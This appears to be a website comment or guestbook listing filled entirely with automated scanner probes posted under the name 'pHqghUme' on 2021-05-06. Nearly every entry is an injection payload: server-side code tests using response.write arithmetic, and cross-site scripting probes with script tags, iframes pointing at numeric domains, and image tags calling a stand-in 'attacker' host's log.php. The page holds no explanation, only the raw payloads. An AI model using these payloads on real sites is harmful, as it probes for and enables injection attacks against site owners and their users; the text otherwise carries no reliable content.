 • pHqghUme

  2021-05-06 07:42:50


  '+response.write(9792407*9591206)+'


 • "+response.write(9490144*9822632)+"

  2021-05-06 07:42:49


  1


 • '+response.write(9490144*9822632)+'

  2021-05-06 07:42:48


  1


 • response.write(9490144*9822632)

  2021-05-06 07:42:47


  1


 • pHqghUme

  2021-05-06 07:42:46


  1


 • pHqghUme

  2021-05-06 07:42:46


  1


 • pHqghUme

  2021-05-06 07:42:45


  1


 • pHqghUme

  2021-05-06 07:42:44


  1


 • pHqghUme

  2021-05-06 07:42:43


  1


 • pHqghUme

  2021-05-06 07:42:42


  1


 • pHqghUme

  2021-05-06 07:42:31


  1


 • pHqghUme

  2021-05-06 07:36:44


  1


 • pHqghUme

  2021-05-06 07:36:26


  1


 • pHqghUme

  2021-05-06 07:36:17


  1S82rmRCO


 • 1LZYmEaYO

  2021-05-06 07:36:15


  1


 • pHqghUme

  2021-05-06 07:36:14


  1


 • pHqghUme

  2021-05-06 07:36:13


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 03:09:11


  1<wYdCYR<


 • pHqghUme

  2021-05-06 03:09:05


  1<img sRc='http://attacker-9857/log.php?


 • pHqghUme

  2021-05-06 03:08:57


  1<8JKjtl x=9051>


 • pHqghUme

  2021-05-06 03:08:41


  1<ifRAme sRc=9498.com></IfRamE>


 • pHqghUme<lZnh9e<

  2021-05-06 03:08:39


  1


 • pHqghUme<img sRc='http://attacker-9132/log.php?

  2021-05-06 03:08:28


  1


 • pHqghUme

  2021-05-06 03:08:26


  1<W1JMJC>9W8LI[!+!]</W1JMJC>


 • pHqghUme<AyJr2G x=9316>

  2021-05-06 03:08:17


  1


 • pHqghUme

  2021-05-06 03:08:06


  1IaByf <ScRiPt >gTY6(9736)</ScRiPt>


 • pHqghUme<ifRAme sRc=9497.com></IfRamE>

  2021-05-06 03:08:02


  1